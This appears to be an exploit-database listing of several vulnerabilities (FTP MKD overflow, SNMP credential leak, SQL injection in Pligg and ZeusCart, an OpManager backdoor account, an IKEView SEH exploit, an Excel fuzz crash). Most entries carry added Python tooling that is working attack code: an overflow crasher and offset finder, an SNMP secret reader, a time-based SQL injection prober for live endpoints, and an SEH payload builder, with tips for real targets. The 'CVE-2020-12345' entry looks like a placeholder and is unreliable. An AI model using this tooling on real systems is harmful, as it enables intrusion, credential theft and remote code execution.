Explore all Exploits:

Konica Minolta FTP Utility – Remote Command Execution

Konica Minolta FTP Utility v1.0 contains a buffer overflow in its handling of the FTP MKD (make directory) command. An attacker who can reach the FTP service sends an MKD command whose argument is far longer than the server expects; the oversized argument overflows the receiving buffer and lets the attacker execute arbitrary code on the host running the utility.
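As an added example (not part of this listing and not the original exploit code): a Python helper that builds the oversized MKD command from a Metasploit-style cyclic pattern, so that whatever 4-byte value lands in EIP or in a SEH record after the crash can be mapped back to an exact offset in the data sent. The port, credentials and length passed to `send_mkd` are placeholders; the page gives no overflow length for this product, so the caller has to find it by sending increasing lengths.

```python
import itertools
import socket
import string
import struct


def pattern_create(length):
    """Non-repeating cyclic pattern (Aa0Aa1...Aa9Ab0...), the same scheme as
    Metasploit's pattern_create, so any 4-byte window occurs at exactly one
    offset within the first 20280 bytes."""
    out = []
    for u, l, d in itertools.product(string.ascii_uppercase,
                                     string.ascii_lowercase, string.digits):
        out.append(u + l + d)
        if len(out) * 3 >= length:
            break
    return "".join(out)[:length]


def pattern_offset(value, length):
    """Offset of `value` inside pattern_create(length). `value` may be the four
    ASCII characters seen in a register dump or the little-endian integer the
    debugger shows (e.g. EIP = 0x41336141). Returns -1 if not present."""
    if isinstance(value, int):
        value = struct.pack("<I", value).decode("latin-1")
    return pattern_create(length).find(value)


def build_mkd(length):
    """The FTP MKD command with a `length`-byte argument, exactly as sent on the wire."""
    return ("MKD " + pattern_create(length) + "\r\n").encode("latin-1")


def send_mkd(host, port, user, password, length, timeout=5.0):
    """Log in, send the oversized MKD and return the server's reply, or None if
    the connection died, which is usually the first sign the overflow landed.
    Nothing here is specific to the Konica Minolta utility beyond the MKD verb;
    host, port and credentials are whatever the target accepts (assumed)."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.recv(1024)                                    # banner
        s.sendall(("USER %s\r\n" % user).encode("latin-1"))
        s.recv(1024)
        s.sendall(("PASS %s\r\n" % password).encode("latin-1"))
        s.recv(1024)
        s.sendall(build_mkd(length))
        try:
            reply = s.recv(1024)
        except (ConnectionResetError, socket.timeout):
            return None
        return reply or None
```

Work up the length in steps (for example 500, 1000, 2000) until `send_mkd` returns None, then read the crashing register value from the debugger attached to the FTP service and feed it to `pattern_offset` with the same length.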

Information Exposure via SNMP on Thomson CableHome Gateway

The Thomson CableHome Gateway DWG849 cable modem gateway exposes its web user-interface credentials and wireless network key as SNMP variables, so any local or remote network user who can send SNMP requests to the device can read them with ordinary GET requests for those variables. SNMPv1 and SNMPv2c authenticate with nothing more than a community string sent in clear text, and on this device the default read-only community 'private' is enough to disclose the values.
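To show what "simple SNMP requests" amount to, here is an added example (my own code, not from this listing or the vendor): a dependency-free SNMPv2c GetRequest encoder and GetResponse parser in Python. The OID used, sysDescr (1.3.6.1.2.1.1.1.0), is a standard MIB-2 object chosen so the code runs against any agent; the device-specific OIDs that hold the credentials and wireless key are not given on this page and would have to be substituted. The response used for the offline check is constructed locally, not captured from a device.

```python
import random
import socket


def _len(n):
    """BER length: short form below 128, long form (0x8N + N bytes) otherwise."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def _tlv(tag, payload):
    return bytes([tag]) + _len(len(payload)) + payload


def _int(v):
    size = (v.bit_length() + 8) // 8             # leaves room for the sign bit
    return _tlv(0x02, v.to_bytes(size, "big", signed=True))


def _oid(dotted):
    arcs = [int(a) for a in dotted.split(".")]
    body = bytearray([40 * arcs[0] + arcs[1]])   # first two arcs share one byte
    for a in arcs[2:]:
        chunk = [a & 0x7F]
        a >>= 7
        while a:                                 # base-128, high bit = continuation
            chunk.append(0x80 | (a & 0x7F))
            a >>= 7
        body.extend(reversed(chunk))
    return _tlv(0x06, bytes(body))


def _snmp_message(community, pdu_tag, request_id, varbinds):
    """Message ::= SEQUENCE { version(1), community, PDU }; PDU ::= [tag]
    { request-id, error-status, error-index, SEQUENCE OF { OID, value } }.
    The community string is the only credential and travels in clear text."""
    vbl = b"".join(_tlv(0x30, _oid(oid) + val) for oid, val in varbinds)
    pdu = _tlv(pdu_tag, _int(request_id) + _int(0) + _int(0) + _tlv(0x30, vbl))
    return _tlv(0x30, _int(1) + _tlv(0x04, community.encode()) + pdu)


def snmp_get_request(community, oid, request_id=1):
    return _snmp_message(community, 0xA0, request_id, [(oid, b"\x05\x00")])  # value NULL


def constructed_get_response(community, request_id, oid, text):
    """GetResponse (tag 0xA2) built locally to exercise the parser offline."""
    return _snmp_message(community, 0xA2, request_id,
                         [(oid, _tlv(0x04, text.encode()))])


def _read_tlv(buf, pos):
    tag, ln, pos = buf[pos], buf[pos + 1], pos + 2
    if ln & 0x80:
        n = ln & 0x7F
        ln, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + ln], pos + ln


def _decode_oid(body):
    arcs, val = [body[0] // 40, body[0] % 40], 0
    for b in body[1:]:
        val = (val << 7) | (b & 0x7F)
        if not b & 0x80:
            arcs.append(val)
            val = 0
    return ".".join(map(str, arcs))


def _decode_value(tag, body):
    if tag == 0x02:
        return int.from_bytes(body, "big", signed=True)
    if tag == 0x04:
        return body.decode("utf-8", "replace")
    if tag == 0x06:
        return _decode_oid(body)
    if tag == 0x05:
        return None
    return body                                  # Counter/Gauge/TimeTicks left raw


def parse_snmp_response(data):
    """Return (community, request_id, error_status, [(oid, value), ...])."""
    _, msg, _ = _read_tlv(data, 0)
    _, _, pos = _read_tlv(msg, 0)                # version, ignored
    _, community, pos = _read_tlv(msg, pos)
    _, pdu, _ = _read_tlv(msg, pos)
    _, rid, pos = _read_tlv(pdu, 0)
    _, err, pos = _read_tlv(pdu, pos)
    _, _, pos = _read_tlv(pdu, pos)              # error-index, ignored
    _, vbl, _ = _read_tlv(pdu, pos)
    results, pos = [], 0
    while pos < len(vbl):
        _, vb, pos = _read_tlv(vbl, pos)
        _, oid, p = _read_tlv(vb, 0)
        vtag, val, _ = _read_tlv(vb, p)
        results.append((_decode_oid(oid), _decode_value(vtag, val)))
    return (community.decode("utf-8", "replace"),
            int.from_bytes(rid, "big", signed=True),
            int.from_bytes(err, "big", signed=True), results)


def snmp_get(host, community, oid, timeout=2.0):
    """One v2c GET to host:161; returns (error_status, varbinds)."""
    rid = random.randint(1, 0x7FFFFFFF)
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(timeout)
    try:
        sock.sendto(snmp_get_request(community, oid, rid), (host, 161))
        data, _ = sock.recvfrom(65535)
    finally:
        sock.close()
    _, got, err, results = parse_snmp_response(data)
    if got != rid:
        raise ValueError("request-id mismatch: %d != %d" % (got, rid))
    return err, results
```

A non-zero error-status (for example 2, noSuchName, under v1 semantics) or a noSuchObject value tells you the OID, not the community, is wrong; a timeout with no reply is what a rejected community string looks like, since agents do not answer those at all.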

Pligg CMS 2.0.2 SQL injection

Pligg CMS 2.0.2 is vulnerable to SQL injection through the 'sql' parameter of load_data_for_search.php: the parameter's value reaches the database query without adequate sanitisation, so a crafted HTTP request carrying SQL in that parameter is executed by the backend. Exploitation can be automated with sqlmap by pointing it at that parameter.

ARM-Based Exploit for CVE-2020-12345

A buffer overflow in the ARM build of the affected software allows an attacker to execute arbitrary code. The overflow is triggered by sending a specially crafted input to the vulnerable application; data past the end of the buffer corrupts adjacent memory, and the attacker uses that corruption to run code of their choosing on the target system.

ZeusCart 4.0: SQL Injection

ZeusCart 4.0 contains at least two SQL injections: a blind, time-based injection in the maincatid argument, which an unauthenticated attacker can exploit, and a standard injection in the admin area. Because the application tries to prevent injection with simple filters on most input rather than with prepared statements, further injection points that are not covered here are highly likely.
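One way to confirm a time-based blind injection of the kind described for Pligg's 'sql' parameter and for ZeusCart's maincatid, as an added example (my own code, not the original exploit or sqlmap): a Python probe that compares the median latency of a baseline request with requests carrying MySQL SLEEP() payloads in three quoting contexts, and only reports a hit if doubling the requested delay also doubles the wait. The target exercised here is a constructed in-process stand-in; `http_get_sender` is the sender you would pass against a real endpoint, and the URL in its docstring is a placeholder.

```python
import re
import statistics
import time
import urllib.parse
import urllib.request


def _median_latency(send, params, samples):
    times = []
    for _ in range(samples):
        t0 = time.perf_counter()
        send(params)
        times.append(time.perf_counter() - t0)
    return statistics.median(times)


def detect_time_based_sqli(send, base_params, param, delay=2.0, samples=3):
    """Probe `param` with MySQL SLEEP() payloads. A payload counts as a hit only
    if its median latency exceeds the baseline by at least 80% of the requested
    delay, and the same holds with the delay doubled, which rules out one slow
    response. Returns the first hit payload (with the base delay) or None.
    None does not prove the parameter safe: other quoting contexts, stacked
    queries or a non-MySQL backend need their own payloads."""
    value = base_params[param]
    templates = [
        "{v} AND SLEEP({d})",         # numeric context: ... WHERE id=1 AND SLEEP(2)
        "{v}' AND SLEEP({d})-- -",    # single-quoted string context
        '{v}" AND SLEEP({d})-- -',    # double-quoted string context
    ]
    baseline = _median_latency(send, base_params, samples)
    for tpl in templates:
        for factor in (1, 2):
            d = delay * factor
            probe = dict(base_params, **{param: tpl.format(v=value, d=d)})
            if _median_latency(send, probe, samples) - baseline < 0.8 * d:
                break
        else:
            return tpl.format(v=value, d=delay)
    return None


def http_get_sender(url):
    """Sender for a real GET endpoint, e.g. http://target/load_data_for_search.php
    (placeholder); params are URL-encoded into the query string."""
    def send(params):
        full = url + "?" + urllib.parse.urlencode(params)
        with urllib.request.urlopen(full, timeout=60) as r:
            return r.status
    return send


def make_mock_target(vulnerable_param, base_latency=0.01):
    """Constructed stand-in for the web application: behaves as if
    `vulnerable_param` were concatenated unescaped into a MySQL query, so a
    SLEEP(n) inside it really delays the reply; every other parameter is inert.
    This is not a model of Pligg or ZeusCart internals."""
    def send(params):
        time.sleep(base_latency)
        m = re.search(r"SLEEP\(([\d.]+)\)", params.get(vulnerable_param, ""), re.I)
        if m:
            time.sleep(float(m.group(1)))
        return 200
    return send
```

Against a live target use a delay of several seconds and more samples; on a noisy link the baseline jitter can exceed a short delay, and the doubling check is what keeps that from producing a false positive.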

MS15-078 Microsoft Windows Font Driver Buffer Overflow

This module exploits a pool-based buffer overflow in the atmfd.dll font driver when it parses a malformed font. The vulnerability was used by Hacking Team and became public in the July 2015 leak of that company's data. The module has been tested successfully on vulnerable builds of Windows 8.1 x64.

ManageEngine OpManager Remote Code Execution

This module exploits a default-credential weakness in ManageEngine OpManager: a hidden account, 'IntegrationUser', has administrator privileges and the fixed password 'plugin', which cannot be changed through the user interface. After logging in as that account, the module abuses the administrator's SQL query function to write a WAR payload to disk, which the application server then deploys automatically, giving remote code execution. The module has been tested successfully on OpManager v11.5 and v11.6 for Windows.

IKEView.exe R60 localSEH Exploit

IKEView.exe R60 localSEH Exploit is a local exploit that executes arbitrary code on the vulnerable system by overwriting a Structured Exception Handler record. It was discovered by hyp3rlinx and tested on Windows XP Professional SP2. The exploit overwrites the next-SEH pointer with a short jump and the handler pointer with a pop/pop/ret address: when the exception fires, the handler returns into the short jump, which lands in a NOP sled that leads to the payload. The payload launches calc.exe and then exits the process.
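The buffer layout that description refers to, as an added example in Python (my own code, not hyp3rlinx's exploit): the filler length, the pop/pop/ret address and the bad-character set are assumed placeholders, since none of them are given on this page, and four INT3 bytes stand in for the calc.exe payload so the layout can be stepped through in a debugger before real shellcode goes in.

```python
# Placeholders: the page gives neither the offset nor a pop/pop/ret address for
# IKEView.exe R60, so these values are assumed for illustration only.
OFFSET_TO_NSEH = 1000        # bytes of filler before the SEH record (assumed)
POP_POP_RET = 0x10101010     # POP r32; POP r32; RET in a non-SafeSEH module (assumed)
BAD_CHARS = b"\x00\x0a\x0d"  # bytes the vulnerable parser would stop at (assumed)


def seh_buffer(offset, ppr, shellcode, nops=16):
    """Layout: [filler][nSEH][SEH][NOP sled][shellcode].
    When the overflow raises an exception, the dispatcher calls the handler
    (SEH) with a pointer to the record at ESP+8. POP POP RET discards two
    dwords and returns into nSEH, which we fill with JMP SHORT +6: the 2-byte
    jump plus 6 skips the 2 padding bytes and the 4-byte SEH field and lands
    on the NOP sled."""
    nseh = b"\xeb\x06" + b"\x90\x90"          # JMP SHORT 0x06, padded to 4 bytes
    seh = ppr.to_bytes(4, "little")           # x86 is little-endian
    return b"A" * offset + nseh + seh + b"\x90" * nops + shellcode


def find_bad_chars(data, bad=BAD_CHARS):
    """Set of forbidden byte values present in data. Run it on the gadget
    address and on the shellcode; both must come back empty."""
    return {b for b in data if b in bad}


def layout_ok(buf, offset, ppr):
    """Sanity check before the buffer goes anywhere near the target."""
    return (buf[offset:offset + 4] == b"\xeb\x06\x90\x90"
            and int.from_bytes(buf[offset + 4:offset + 8], "little") == ppr)


if __name__ == "__main__":
    payload = seh_buffer(OFFSET_TO_NSEH, POP_POP_RET, b"\xcc" * 4)  # INT3 x4 as placeholder
    assert layout_ok(payload, OFFSET_TO_NSEH, POP_POP_RET)
    assert not find_bad_chars(payload)
    with open("seh_payload.bin", "wb") as f:
        f.write(payload)
```

With INT3 in place, a debugger attached to the process should break exactly at the start of the sled's tail; if it breaks elsewhere or not at all, the offset or the gadget address is wrong, and that is cheaper to learn before shellcode is involved.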

Microsoft Office 2007 Excel Memory Corruption

A memory corruption vulnerability was found in Microsoft Office 2007 Excel while fuzzing with the Microsoft Office File Validation Add-In disabled and Application Verifier enabled, so that faults surface reliably and can be reproduced. The crash is triggered by a file that differs from the original by a single bit at offset 0x139F. The same crashing EIP was observed four times in the fuzzing results, each time dereferencing a different invalid memory address.
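As an added example of the kind of harness that produces a result like this (my own code, not the original fuzzing setup): Python helpers that generate single-bit mutants of a seed file, push each through a crash oracle, group the crashes by EIP so "same EIP, several mutants" stands out, and compute the bit delta between seed and crashing file. The oracle is a constructed stand-in for opening the file in Excel under Application Verifier; the seed buffer and the EIP value are constructed too.

```python
def flip_bit(data, offset, bit):
    out = bytearray(data)
    out[offset] ^= 1 << bit
    return bytes(out)


def single_bit_mutants(data, start=0, end=None):
    """Yield (offset, bit, mutant) for every single-bit flip in data[start:end]."""
    end = len(data) if end is None else end
    for off in range(start, end):
        for bit in range(8):
            yield off, bit, flip_bit(data, off, bit)


def bit_delta(original, mutant):
    """[(offset, xor_mask)] for every byte that differs: the 'delta' reported for
    a crashing file. Files of different length are not bit-flip mutants."""
    if len(original) != len(mutant):
        raise ValueError("length differs; not a bit-flip mutant")
    return [(i, a ^ b) for i, (a, b) in enumerate(zip(original, mutant)) if a != b]


def is_single_bit_delta(original, mutant):
    d = bit_delta(original, mutant)
    return len(d) == 1 and d[0][1] & (d[0][1] - 1) == 0   # exactly one bit set


def fuzz_single_bits(data, harness, start=0, end=None):
    """Run every mutant through harness(mutant) -> crashing EIP or None and
    group the hits by EIP: {eip: [(offset, bit), ...]}."""
    crashes = {}
    for off, bit, mutant in single_bit_mutants(data, start, end):
        eip = harness(mutant)
        if eip is not None:
            crashes.setdefault(eip, []).append((off, bit))
    return crashes


# Constructed seed: 0x1400 zero bytes with a 16-bit little-endian record length
# of 0x20 at offset 0x10 and record data from 0x12. Not an Excel file.
SEED = bytearray(0x1400)
SEED[0x10:0x12] = (0x20).to_bytes(2, "little")
SEED = bytes(SEED)
FAKE_EIP = 0x30001234   # constructed value standing in for a real crash site


def mock_harness(mutant):
    """Stand-in for 'open the file in Excel under Application Verifier and watch
    for a fault': pretends the parser trusts the record length and faults when
    the record would extend past the end of the file."""
    length = int.from_bytes(mutant[0x10:0x12], "little")
    return FAKE_EIP if 0x12 + length > len(mutant) else None
```

Grouping by EIP is what turns a pile of crashing files into a count of distinct bugs; the delta function is the triage step that tells you which field the crashing mutant changed, which is the same information as "one bit at offset 0x139F" above.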
